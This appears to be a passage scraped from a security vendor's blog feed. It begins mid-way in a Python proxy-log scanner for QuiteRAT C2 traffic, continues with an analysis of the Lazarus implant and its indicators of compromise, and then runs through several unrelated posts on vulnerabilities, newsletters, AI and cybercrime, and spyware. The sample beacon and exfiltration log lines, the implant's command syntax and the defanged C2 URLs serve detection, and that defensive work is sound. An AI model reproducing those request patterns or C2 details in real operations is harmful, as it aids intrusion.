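# Constructed log lines: an inbox poll and a sent upload from one host, a webmail
# request that merely contains "mailid=", and an unrelated page fetch.
SAMPLE_LOG = [
    '2023-03-01T10:15:02Z 10.10.4.22 GET http://203.0.113.9/resource/main/rawmail.php'
    '?mailid=3fa9c2d81b07&action=inbox&param=10.10.4.22&session=48213 200 "' + QUITERAT_UA + '"',
    '2023-03-01T10:15:09Z 10.10.4.22 GET http://203.0.113.9/resource/main/rawmail.php'
    '?mailid=3fa9c2d81b07&action=sent&body=eBwdHgkTGQU=&param=10.10.4.22&session=48214 200 "' + QUITERAT_UA + '"',
    '2023-03-01T10:16:40Z 10.10.4.31 GET https://mail.example.invalid/owa/?mailid=12345&action=open 200 '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/110.0 Safari/537.36"',
    '2023-03-01T10:17:05Z 10.10.4.22 GET http://www.example.invalid/index.html 200 "' + QUITERAT_UA + '"',
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit)
```

The User-Agent is a legitimate Firefox 100 string, so on its own it is far too common to alert on; it is carried here only as corroboration once the query shape has matched.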

The malware also has the ability to run a ping command against a random IP address that it generates on the fly. The request is usually executed using the command <comspec_path>\cmd.exe /c ping <IP_Address> -n 18 &:

Ping command being constructed by the implant including the octets for a random IP.

The implant can also receive a command code "sendmail" along with a numeric value from the C2 server. The implant then sleeps for that number of minutes before it begins talking to the C2 server again. The adversaries likely use this functionality to keep the implant dormant for longer periods of time while ensuring continued access to the compromised enterprise network.

The implant also has the ability to receive a second URL from the current C2 server via the command code receivemail. The implant will then reach out to the second URL to receive commands and payloads from the server to execute on the infected system.

We have seen the following versions of QuiteRAT in the wild. We are only able to share one of the file hashes at this time, which is included in the IOCs section:

QuiteRAT binary name: compile date
notify.exe (32-bit): May 30, 2022
acres.exe: July 22, 2022
acres.exe (64-bit): July 25, 2022

The latest version of Lazarus Group’s older MagicRAT implant observed in the wild was compiled in April 2022. This is the last version of MagicRAT that we know of. The use of MagicRAT’s derivative implant, QuiteRAT, beginning in May 2022 (the compile date of the earliest sample above) suggests the actor is changing tactics, opting for a smaller, more compact Qt-based implant.

QuiteRAT vs MagicRAT

QuiteRAT is clearly an evolution of MagicRAT. While MagicRAT is a bigger, bulkier malware family averaging around 18MB in size, QuiteRAT is a much smaller implementation, averaging around 4 to 5MB. This substantial difference in size is due to Lazarus Group incorporating only a handful of required Qt libraries into QuiteRAT, as opposed to MagicRAT, in which they embedded the entire Qt framework. Furthermore, while MagicRAT implements its own persistence by setting up scheduled tasks, QuiteRAT has no persistence capability and must be issued a persistence command by the C2 server to achieve continued operation on the infected endpoint. This is another contributing factor to the smaller size of QuiteRAT.

There are similarities between the implants that indicate that QuiteRAT is a derivative of MagicRAT. Apart from being built on the Qt framework, both implants consist of the same abilities, including running arbitrary commands on the infected system. Both implants also use base64 encoding to obfuscate their strings with an additional measure, such as XOR or prepending hardcoded data, to make it difficult to decode the strings automatically. Additionally, both implants use similar functionality to allow them to remain dormant on the endpoint by specifying a sleep period for them by the C2 server.

Coverage

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs

IOCs for this research can also be found at our Github repository here.

Hashes

QuiteRAT

ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6

Network IOCs

146[.]4[.]21[.]94

hxxp[://]146[.]4[.]21[.]94/tmp/tmp/comp[.]dat

hxxp[://]146[.]4[.]21[.]94/tmp/tmp/log[.]php

hxxp[://]146[.]4[.]21[.]94/tmp/tmp/logs[.]php

hxxp[://]ec2-15-207-207-64[.]ap-south-1[.]compute[.]amazonaws[.]com/resource/main/rawmail[.]php

Three vulnerabilities in NVIDIA graphics driver could cause memory corruption

23 August 2023 at 16:56
Piotr Bania of Cisco Talos discovered the vulnerabilities mentioned in this post.

Cisco Talos recently disclosed three vulnerabilities in the shader functionality of the NVIDIA D3D10 driver that works with NVIDIA’s graphics cards.

The driver is vulnerable to memory corruption if an adversary sends a specially crafted shader packet.

All three issues, identified as TALOS-2023-1719 (CVE-2022-34671), TALOS-2023-1720 (CVE-2022-34671) and TALOS-2023-1721 (CVE-2022-34671), have a CVSS severity rating of 8.5 out of 10.

An attacker could exploit these vulnerabilities from guest machines running virtualization environments (such as VMware, QEMU and VirtualBox) to perform a guest-to-host escape, as we’ve illustrated with previous vulnerabilities in NVIDIA graphics drivers.

Talos' research also indicates that these vulnerabilities could be triggered from a web browser using WebGL and WebAssembly. Our researchers triggered these issues from a HYPER-V guest using the RemoteFX feature, leading to the execution of vulnerable code on the HYPER-V host (inside the rdvgm.exe process). Microsoft recently deprecated RemoteFX, but older machines may still use this software.

Talos worked with NVIDIA to ensure these vulnerabilities are resolved and an update is available for affected customers, all in adherence to Cisco’s vulnerability disclosure policy.

For Snort coverage (SIDs 61386, 61387, 61398, 61399, 61410 and 61411) that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.

Generating FLIRT signatures for Nim and other non-C programming languages

22 August 2023 at 09:03

Adversaries are increasingly writing malware in programming languages such as Go, Rust, or Nim, because they present challenges to investigators using reverse-engineering tools designed to work best against the C family of languages.

It’s often difficult for reverse engineers examining non-C languages to differentiate between the malware author’s code and the language’s standard library code. In the vast majority of cases, Hex-Rays’ Interactive Disassembler (IDA) has the out-of-the-box capability to identify library functions or generate custom Fast Library Identification and Recognition Technology (FLIRT) signatures and solve the issue.

But for Nim, generating signatures is distinctly more difficult. Cisco Talos is excited to announce a new project to find an automated way to generate custom FLIRT signatures for IDA, which led to a talk at Recon.cx 2023 and a guest blog on Hex-Rays. This blog describes the technical details of our research.

Recapping the top stories from Black Hat and DEF CON

17 August 2023 at 18:00

Welcome to this week’s edition of the Threat Source newsletter.

I had a significant amount of FOMO last week seeing everyone out in Vegas. (I was happy to not get conference crud sickness, but it seems like I missed a great time otherwise.)

But, as anyone who works with me could guess, I was following closely online through social media and news reporting. If you’re in the same boat as me and couldn’t attend Black Hat or DEF CON in person, I wanted to use this space to recap what I felt were the top stories and headlines coming out of the various new research that was published, talks, interviews and more.

Unsurprisingly, it seems like AI was the talk of the town. One panel, which featured the former Cyber Czar in the Obama administration, promised coming action from the Biden administration around AI and its intersection with cybersecurity, including an executive order that apparently will be as broad as earlier orders around the U.S.’ broader approach to security.

There were many other panels and talks around AI, along with questions about whether the technology has plateaued after so many companies developed their own ChatGPT-like tools.

I was also fascinated by several interviews and talks from an FBI official about distributed denial-of-service attacks. I’ve written before about how there’s a renewed interest in DDoS attacks recently, especially those targeting high-profile companies and games.

Two high-ranking government officials gave a joint talk at Black Hat where they said the majority of DDoS attacks are the result of a dispute over business transactions or good ol’ fashioned video game beef.

The same presenters gave additional details on how the FBI prioritizes stopping DDoS attacks. Chances are, if you’re a bad actor who makes the news for DDoS attacks, the federal government is not far behind.

I also always love the crazy vulnerabilities or hacking methods that come out of both these conferences. A highlight for me was a group of researchers who found a way to hijack one of the most popular automatic card shufflers (fitting for Vegas) to the point that someone could know the order of cards ahead of time in a gambling game.

I’m not quite sure what the actual attack surface is here because the potential hacker would need to install a tiny physical USB device into the shuffler, and I don’t think any casino worker would be thrilled to see you crawling around on the floor, but I do always love to see the downside of putting a USB port on everything.

And there was the brief, but confusing, saga at DEF CON about the pop-up notifications iPhone users were getting asking people to pair with a rogue Apple TV. Turns out it was a harmless prank from one of the attendees, who just wanted to drive home the point that it’s important to really turn off Bluetooth all the way, and not just click the little button in the Control Center.

Lastly, we wanted to thank Viktor Zhora, the deputy chairman and chief digital transformation officer at the State Service of Special Communication and Information Protection for Ukraine, for taking the time to say β€œHi” to us on the show floor. He specifically took time out of his day to make sure he could meet Matt Olney, who’s been one of our leaders in helping support Ukraine. Viktor was a speaker at Black Hat and had a very busy schedule of media appearances, so we were flattered that he made sure to see Matt.

The one big thing

Since AI was already the talk of the town at Black Hat and DEF CON, we wanted to continue the conversation around these tools and the implications on cybersecurity. As one of our incident responders wrote in the latest in our β€œOn the Radar” series, AI’s influence is growing across the security space, bringing with it major implications for cybercriminals and defenders. The recent adoption of AI has raised significant concerns for cybersecurity due to the many ways that criminals can use AI for disruption and profit.

Why do I care?

AI can help streamline criminals' operations, making them more efficient, sophisticated, and scalable while allowing them to evade detection and attribution. AI presents another avenue for cybercriminals to exploit by utilizing it to analyze enormous amounts of information, including leaked data. This analysis empowers them to identify vulnerabilities or high-value targets, enabling more precise and effective attacks that could potentially yield greater financial gains. For defenders, though, AI also opens the door to new defensive tactics and tools, so it’s important to see the positives and negatives of AI in security.

So now what?

There is no real action for the average user to take at this point, but I feel this piece is a good opportunity for everyone to take a step back about what we currently know, and don’t know, about AI and its intersection with security.

Top security headlines of the week

Two police precincts in the U.K. had mistakenly been leaking the personal information of individuals connected to crimes for years. The UK's Norfolk and Suffolk police constabularies disclosed that, between April 2021 and March 2022, the information was accidentally attached to crime statistics distributed as part of Freedom of Information Act (FOIA) requests. The data includes personally identifiable information related to witnesses, suspects and victims of a variety of crimes, including domestic violence, assaults, thefts and hate crimes. The forces say they are now contacting more than 1,200 people who may have been affected. Representatives from the two departments said in a statement that, β€œStrenuous efforts have been made to determine if the data released has been accessed by anyone outside of policing. At this stage we have found nothing to suggest that this is the case.” (CSO Online, Politico)

Viktor Zhora, one of Ukraine’s top cybersecurity officials, said at Black Hat that his country is taking several steps to document what may constitute war crimes committed by Russian state-sponsored actors. Zhora said that attacks affecting critical infrastructure and communications for civilians could fall under such umbrellas and his team is actively collecting evidence as the kinetic military conflict continues. Speaking alongside Zhora, Jen Easterly, the U.S.’ top cybersecurity official, said the U.S. has learned several lessons from Russia’s invasion of Ukraine, including the importance of assistance from private cybersecurity companies. (CyberScoop, The Record)

Several years’ worth of Intel chips contain a newly discovered flaw known as β€œDownfall,” which is similar to the Meltdown and Spectre bugs from several years ago. Identified as CVE-2022-40982, the issue could allow the CPU to β€œunintentionally reveal internal hardware registers to software,” according to a write-up from Google’s security research team. Proof of concept code shows that an attacker could use Downfall to steal encryption keys from other users on a given server and other sensitive data. Downfall affects most CPUs in Intel's 6th through 11th-generation Core lineups for consumer PCs. Most of the affected devices were sold starting in 2015 and may still be available in systems today. Intel’s patch for the issue negatively affects the performance of the CPUs, with some studies finding that performance could dip to 40 percent. (Ars Technica, PC World)

Can’t get enough Talos?

Upcoming events where you can find Talos

Grace Hopper Celebration (Sept. 26 - 29)

Orlando, Florida

Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.

ATT&CKcon 4.0 (Oct. 24 - 25)

McLean, Virginia

Nicole Hoffman and James Nutland discuss the MITRE ATT&CK framework in β€œOne Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often techniques are thrown at the bottom of reports and blogs without any context, never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

Most prevalent malware files from Talos telemetry over the past week


SHA 256: 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1
MD5: 3e10a74a7613d1cae4b9749d7ec93515
Typical Filename: IMG001.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Coinminer::1201

SHA 256: 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725
MD5: d47fa115154927113b05bd3c8a308201
Typical Filename: mssqlsrv.exe
Claimed Product: N/A
Detection Name: Trojan.GenericKD.65065311

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376
Typical Filename: c0dwjdi6a.dll
Claimed Product: N/A
Detection Name: Trojan.GenericKD.33515991

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
MD5: 2915b3f8b703eb744fc54c81f4a9c67f
Typical Filename: VID001.exe
Claimed Product: N/A
Detection Name: Win.Worm.Coinminer::1201

SHA 256: 1c25a55f121d4fe4344914e4d5c89747b838506090717f3fb749852b2d8109b6
MD5: 4c9a8e82a41a41323d941391767f63f7
Typical Filename: !!Mreader.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Generic::sheath

The rise of AI-powered criminals: Identifying threats and opportunities

14 August 2023 at 12:40
  • AI’s influence is growing across the security space, bringing with it major implications for cybercriminals and defenders.
  • The recent adoption of AI has raised significant concerns for cybersecurity due to the many ways that criminals can use AI for disruption and profit.
  • Defenders and law enforcement can use AI to strengthen cybersecurity and counteract illicit activities.

The past decade has seen a massive adoption in machine learning and artificial intelligence. An increasing number of organizations have been leveraging such technologies to automate their operations and make their products and services better.

Despite the extensive use of machine learning (ML) and artificial intelligence (AI) by organizations for some time now, many users have first interacted with such technologies over the past few months in the form of generative AI helping users to generate text, code, images and other digital assets with the provision of limited input. The likes of ChatGPT have brought AI to the top of the public’s mind, fueling an intensive race for AI development.

As with any innovation, the use of AI is expected to have positive and negative effects on global culture as we know it, but I suspect that cybercrime will be one of the areas most affected. On the negative side, AI can help streamline criminals' operations, making them more efficient, sophisticated, and scalable while allowing them to evade detection and attribution. Concerning the positive impact of AI on cybersecurity, defenders and law enforcement can use AI to counteract advancements in illicit activity by developing new tools, tactics and strategies to automate data analysis, perform predictive detection of illicit activity and perform more effective attribution of criminal activity.

It is important to acknowledge that the AI use cases discussed in this blog encompass a range of varying complexities to achieve for both criminals and defenders. Certain use cases can be accomplished using readily available AI-enabled tools, while others demand advanced technical skills, costly infrastructure, and considerable time investments.

Empowering cybercrime

Cybercriminals are expected to benefit in many ways from advancements in machine learning and artificial intelligence.

A major area of impact of AI tools in cybercrime is the reduced need for human involvement in certain aspects of cybercriminal organizations, such as software development, scamming, extortions, etc., which in turn will decrease the need to recruit new members and lower operational costs due to the reduced need for headcount. While crime-related "job" postings typically find their way onto dark web forums and other anonymous channels, striving to ensure author anonymity, this practice carries significant risks as it could potentially unveil the identities and operations of criminals to whistleblowers and undercover law enforcement agents.

AI presents another avenue for cybercriminals to exploit by utilizing it to analyze enormous amounts of information, including leaked data. This analysis empowers them to identify vulnerabilities or high-value targets, enabling more precise and effective attacks that could potentially yield greater financial gains. Big data analytics is a complex undertaking necessitating significant processing power and thereby limiting its application to potentially large criminal organizations and state-sponsored actors capable of harvesting such power.

Another area of criminal activity that can thrive with AI is the development of more sophisticated phishing and social engineering attacks. This includes the creation of remarkably realistic deepfakes, deceitful websites, disinformation campaigns, fraudulent social media profiles and AI-powered scam bots. To illustrate the impact, consider an incident from 2020 wherein an AI-powered voice cloning attack successfully impersonated a CEO, resulting in the theft of more than $240,000 from a UK-based energy company. Similarly, in India criminals employed a machine learning model to analyze and mimic the writing style of a victim's email contacts to create highly personalized and persuasive phishing emails.

The utilization of AI is anticipated to also be prevalent among state-sponsored actors and prominent criminal organizations, to propagate disinformation and manipulate the public. Such tactics involve the creation and dissemination of deceptive content, including deep fakes, voice cloning, and the deployment of bots. Evidence of such practices already exists by a cybercriminal group employing AI for social media manipulation and spreading disinformation about the COVID-19 pandemic. This campaign relied on machine learning to identify emerging trends and generate highly convincing fake news articles.

The advancement of malware can also be impacted by allowing authors to streamline the process with the help of AI, enabling the creation of sophisticated and more adaptable malware. This would allow AI-powered malware to employ advanced techniques to evade detection by security solutions, utilizing "self-metamorphic" mechanisms that render it capable of changing its operations based on the environment it operates in. Furthermore, criminals can potentially harness AI technology in the development of AI-powered malware development kits. These kits employ AI agents that learn from the latest tools, tactics, and procedures (TTPs) employed by malware authors, as well as stay updated with the latest advancements in security. An example of AI-powered malware is demonstrated by the researchers behind DeepLocker, who showcased how AI can be used to enhance targeted attacks, ensuring exploitation only when the intended target is present and evading detection by concealing itself within benign applications.

Counteracting cybercrime

On the other side, cybersecurity professionals, defenders, and law enforcement agencies can harness the power of AI to counteract the advancements made in cybercrime. They can utilize AI to develop innovative tools, tactics, and strategies in their fight against malicious activities.

Areas such as threat detection and prevention will be at the forefront of AI security research. Many existing security tools rely solely on malicious signatures and user input, which renders them ineffective for detecting advanced attacks. Consequently, an increasing number of vendors are turning to machine learning (ML) and AI technologies to achieve more precise and effective threat detection. Prominent examples include Cisco Secure Endpoint and Cisco Umbrella, which utilize advanced machine learning to detect and mitigate suspicious behavior in an automated manner on end hosts and networks respectively. The inclusion of these technologies is likely to counter the AI-generated malware discussed above.

Analysis of large amounts of data for the identification of indicators of compromise can be a tedious undertaking, consuming considerable time and money. As such, one area that can benefit from AI is incident response and forensics, through the automated analysis of large volumes of logs, system images, network traffic and user behavior for the identification of indicators of compromise (IOCs) and adversarial activity. AI can help speed up the investigation process, identify patterns that may be difficult to detect manually, and provide insights into the techniques and tools used by adversaries, allowing more companies globally to have incident response and forensic capabilities.

Another potential use for AI by defenders and law enforcement alike is to enhance the attribution of criminal activity to adversaries through the analysis of multiple data points, including attack signatures, malware characteristics, and historical attack patterns, tools, tactics, and procedures. By examining these data sets, AI can identify patterns and trends that aid cybersecurity experts in narrowing down the potential origin of an attack. This attribution is valuable as it provides insights into the motives and capabilities of the attackers, allowing for a better understanding of their tactics and potential future threats. In addition, it allows defenders to more accurately identify adversaries that are leveraging tactics to evade identification by misleading attribution (e.g., using techniques, methodologies and tools another hacking group is using), which is an existing occurrence that defenders must consider when performing attribution. Such capabilities are primarily expected to be witnessed in the arsenal of state-affiliated cyber agencies as well as on a corporate level from threat intelligence providers.

ML algorithms and AI are set to expand their utilization for automated analysis and the identification of threats. Through the automated analysis of security-related data from multiple sources like threat intelligence feeds, dark web monitoring, and open-source intelligence, emerging threats can be identified and mitigated effectively. Cisco Talos has been leveraging AI for several years to automate threat intelligence operations such as the classification of similarly rendered web pages, identifying spoofing attempts through logo analysis, phishing email classification based on text analytics and binary similarity analysis. Although existing work around emerging threats has proven to be highly effective, AI will further the area by allowing for more automated data collection, analysis, and correlation on a larger scale, facilitating the identification of patterns and trends that may signify new attack techniques or threat actors. This empowers cybersecurity professionals to proactively respond to emerging cyber threats by leveraging AI's ability to process and interpret vast amounts of data swiftly and accurately.

AI can also serve as a valuable tool for predictive analytics, enabling the anticipation of potential cyber threats and vulnerabilities based on historical data and patterns. By analyzing data from past attacks and adversaries, AI systems can identify common trends, patterns, or groups that may indicate or trigger future attacks. This capability empowers cybersecurity experts to take a more proactive stance to security, such as promptly patching vulnerabilities or implementing supplementary security controls, to mitigate potential risks before they are exploited by adversaries. Additionally, AI-driven predictive analytics allows for closer monitoring of adversaries' activities, enabling experts to anticipate and prepare for new attacks. By leveraging AI in this manner, cybersecurity professionals can enhance their defenses and stay one step ahead of evolving threats. A sizable body of predictive cybercrime research exists, highlighting how to practically use AI to support cybercrime research, as well as how to perform predictive analysis based on social and economic factors using Bayesian and Markov theories.

The rise of AI presents new challenges and great opportunities as its user base and applications continue to expand. The effective and targeted utilization of AI-related technologies will play a pivotal role for cybersecurity experts and law enforcement agencies in detecting, defending against, and attributing digital criminal behavior. By harnessing the power of AI, these entities can enhance their capabilities in combating evolving threats and ensuring the security of digital ecosystems. As the landscape of cybercrime evolves, embracing AI will be instrumental in staying ahead of adversaries.

Reflecting on supply chain attacks halfway through 2023

10 August 2023 at 18:00

Welcome to this week’s edition of the Threat Source newsletter.

Between the Talos Takes episode last week and helping my colleague Hazel with the Half-Year in Review, I realized how much of 2023 I had already forgotten.

It’s been a whirlwind, personally and professionally, and I think it’s important for the security community to take a step back occasionally, to look back on what’s already happened in a year and what that tells us about the coming months.

For me, in reading the Year in Review so far and reflecting on it on the podcast, I had completely forgotten about supply chain attacks. I personally think the MOVEit file transfer breach, and follow-on breaches and compromises, has been placed on the back burner because it’s almost too big for us to even conceive of. At this point, nearly every Fortune 500 company has been affected by this in some way.

The dangers of the MOVEit breach continue to grow, with Clop now using torrents to leak targets’ information, potentially making the leaks more dangerous and faster for bad actors to download.

The list of affected organizations grows every day, with the Clop ransomware group adding more names to its leak site, and public companies having to make disclosures about potential data leaks or theft. Yet the news around this seems to have been relegated to regular news posts about, β€œCompany X just got added to the Clop leak site” rather than reflecting on the dangers of supply chain attacks.

I’ve written before about how we aren’t talking about supply chain attacks enough already, and this year alone we’ve seen MOVEit (which, in my opinion, kind of straddles the line as a β€œtraditional” supply chain attack because it’s more of a data breach with more follow-on data breaches), 3CX, and another attack against CircleCI, a continuous integration platform vendor.

3CX was a big deal in the moment, but looking at the Half-Year in Review, I feel like we moved past it so quickly. Instead, headlines are still dominated by ransomware attacks and big-game hunting, which are certainly no less important on the security landscape β€” but it is so easy to get swept up in the day’s goings-on by looking for the latest, fastest updates on security social media.

With Black Hat and β€œHacker Summer Camp” going on over the next few weeks, this seems like the right time to step back and reflect on what’s happened so far this year. This could include just taking time to look back on personal successes, team wins, or just one or two things that happened in February that you may have already forgotten about.

The one big thing

Our researchers recently discovered an unknown threat actor, seemingly of Vietnamese origin, conducting a ransomware operation that’s been going on since at least June 4. This ongoing attack uses a variant of the Yashma ransomware likely to target multiple geographic areas by mimicking WannaCry characteristics. The threat actor uses an uncommon technique to deliver the ransom note. Instead of embedding the ransom note strings in the binary, they download the ransom note from the actor-controlled GitHub repository by executing an embedded batch file.

Why do I care?

This new actor appears to target users and companies all over the world, including a variety of English-speaking nations, Bulgaria, China and Vietnam. Victims hit with this malware are asked to pay a requested ransom in the form of Bitcoin, an amount that doubles if it’s not made within three days post-infection. This Yashma variant also appears to be harder to recover from than the average ransomware β€” after encrypting files, the ransomware wipes the contents of the original, unencrypted file and then replaces the file name with a β€œ?”.

So now what?

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here. There are also numerous protections in place to detect and defend against this malware, as outlined in our blog post.

Top security headlines of the week

Dozens of hospitals and healthcare facilities across the U.S. are still recovering after a large healthcare system was forced to take its computer systems offline as the result of a ransomware attack. Prospect Medical Holdings, a chain that operates hospitals and outpatient facilities in California, Connecticut, Pennsylvania and Rhode Island, first disclosed the incident last week, announcing it was having to shut down some emergency rooms and reroute ambulances to other facilities. The FBI announced it was launching an investigation into the cause of, and actors behind, the attack. Some outpatient facilities, like radiology and heart health clinics, had to close altogether temporarily because they could not function without the use of the company’s computer systems. (CBS News, NBC News)

Cult of the Dead Cow, an infamous hacking group once known for shaming companies into improving their security, is planning to launch a new app framework that puts privacy first. The system will allow individuals and companies to create social media and messaging apps that do not hold onto users’ personal data. Traditional social media companies make a large chunk of their profits off selling that information to advertisers and other companies looking to reach certain demographics. Representatives from the hacking collective are expected to discuss the framework more at the upcoming DEF CON conference. Creators say the framework uses the in-house β€œVeilid” protocol for end-to-end encryption that could make it difficult for even governments to view information on the apps without proper authorization. However, they still face the challenge of convincing developers and companies to design apps that are compatible with Veilid. (Washington Post, DarkReading)

The U.K.’s Electoral Commission revealed this week it was the target of a β€œcomplex cyber attack” that potentially exposed the personal details of millions of British voters. The Commission said adversaries stole copies of the electoral registers from August 2021, but the breach was not discovered until October 2022. However, they’ve yet to β€œconclusively” determine what files, exactly, were accessed. An early report on the attack from the Electoral Commission found that the personal data found on the registers did not present a β€œhigh risk” to the individuals listed on it. However, that information could be paired with other public information or stolen data from other attacks to β€œidentify and profile individuals.” The adversaries were removed from the network as soon as the breach was discovered in October. (Infosecurity Magazine, BBC)

Can’t get enough Talos?

Upcoming events where you can find Talos

Black Hat (Aug. 5 - 10)

Las Vegas, Nevada

Grace Hopper Celebration (Sept. 26 - 29)

Orlando, Florida

Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.

ATT&CKcon 4.0 (Oct. 24 - 25)

McLean, Virginia

Nicole Hoffman and James Nutland discuss the MITRE ATT&CK framework in β€œOne Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often techniques are thrown at the bottom of reports and blogs without any context, never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

Most prevalent malware files from Talos telemetry over the past week


SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376
Typical Filename: c0dwjdi6a.dll
Claimed Product: N/A
Detection Name: Trojan.GenericKD.33515991

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
MD5: 2915b3f8b703eb744fc54c81f4a9c67f
Typical Filename: VID001.exe
Claimed Product: N/A
Detection Name: Win.Worm.Coinminer::1201

SHA 256: 1c25a55f121d4fe4344914e4d5c89747b838506090717f3fb749852b2d8109b6
MD5: 4c9a8e82a41a41323d941391767f63f7
Typical Filename: !!Mreader.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Generic::sheath

SHA 256: 7bf7550ae929d6fea87140ab70e6444250581c87a990e74c1cd7f0df5661575b
MD5: f5e908f1fac5f98ec63e3ec355ef6279
Typical Filename: IMG001.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Coinminer::tpd

Out-of-bounds write vulnerabilities in popular chemistry software; Foxit PDF Reader issues could lead to remote code execution

9 August 2023 at 16:00

Cisco Talos recently worked with two vendors to patch multiple vulnerabilities in a favored software library used in chemistry laboratories and the Foxit PDF Reader, one of the most popular PDF reader alternatives to Adobe Acrobat.

Attackers could exploit these vulnerabilities to carry out a variety of attacks, in some cases gaining the ability to execute remote code on the targeted machine.

Seven of the vulnerabilities included in today’s Vulnerability Roundup have a CVSS severity score of 9.8 out of a possible 10.

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.

Multiple vulnerabilities in Open Babel software

Talos researchers recently discovered multiple vulnerabilities in Open Babel, an open-source software library used in a variety of chemistry and research settings.

Open Babel allows users to β€œsearch, convert, analyze, or store data from molecular modeling, chemistry, solid-state materials, biochemistry, or related areas,” according to its website, and is used in other popular pieces of software in the science field. Therefore, there are cases where these vulnerabilities are accessible via the internet.

The vulnerabilities Talos disclosed to the operators of Open Babel can all be triggered by tricking a user into opening a specially crafted, malformed file. Depending on the platform and on how the code is compiled, these vulnerabilities could lead to arbitrary code execution:

Talos is disclosing these vulnerabilities despite no official fix from Open Babel. The vendor declined to release an update within the 90-day period as outlined in Cisco’s vulnerability disclosure policy.

Several issues in Foxit PDF reader could lead to arbitrary code execution

Foxit PDF Reader is one of the most popular PDF readers on the market, offering many similar features to Adobe Acrobat. The software also includes a browser extension that allows users to read PDFs right in their web browsers.

Talos discovered multiple vulnerabilities in Foxit PDF Reader that could allow an adversary to execute arbitrary code on the targeted machine. An attacker could exploit these issues by tricking a user into opening a specially crafted PDF document or, if the user has the browser extension enabled, by visiting a malicious web page:

What is commercial spyware?

9 August 2023 at 12:00

We’ve talked quite a bit about spyware recently, with very good reason. Recently, concerns have grown regarding the rapid growth of commercial spyware tools, and the way in which they are being used against their intended victims.

This Need to Know article talks about the broader effects of spyware becoming more commercialized, how it is being used, and the differences between commercial spyware and digital extortion.

What is commercial spyware, and why is it a growing trend?

In general terms, spyware is software that can be installed on a device and used to monitor activity and/or capture potentially sensitive data. The term has been around since the 1990s, and the first spyware to be identified was developed by criminals to steal passwords or financial information from devices. Spyware can even be used to track the device's physical location and record from the camera or microphone.

The opportunities for governments and law enforcement to use spyware as part of legal investigations led to the development of commercial spyware. Attackers have long used commercial products developed by legitimate companies to compromise targeted devices.

These products are known as commercial spyware. Commercial spyware operations mainly target mobile platforms with zero- or one-click zero-day exploits to deliver spyware.

Commercial spyware can be seen as having legitimate reasons to exist, especially in instances of crime and terrorism (as long as it is highly regulated). The problem is that there isn’t a universal or global way in which these companies are being regulated.

As such, we’ve seen a growing number of reports of victims who are targeted with commercial spyware. These victims are not criminals or terrorists, but instead, they are associated with activism. For example, there have been reports of journalists who report on human rights abuses, and activists shining a light on oppressive regimes, who have been targeted and compromised with this tooling.

Problems also arise when organizations turn a blind eye to the usage of commercial spyware.

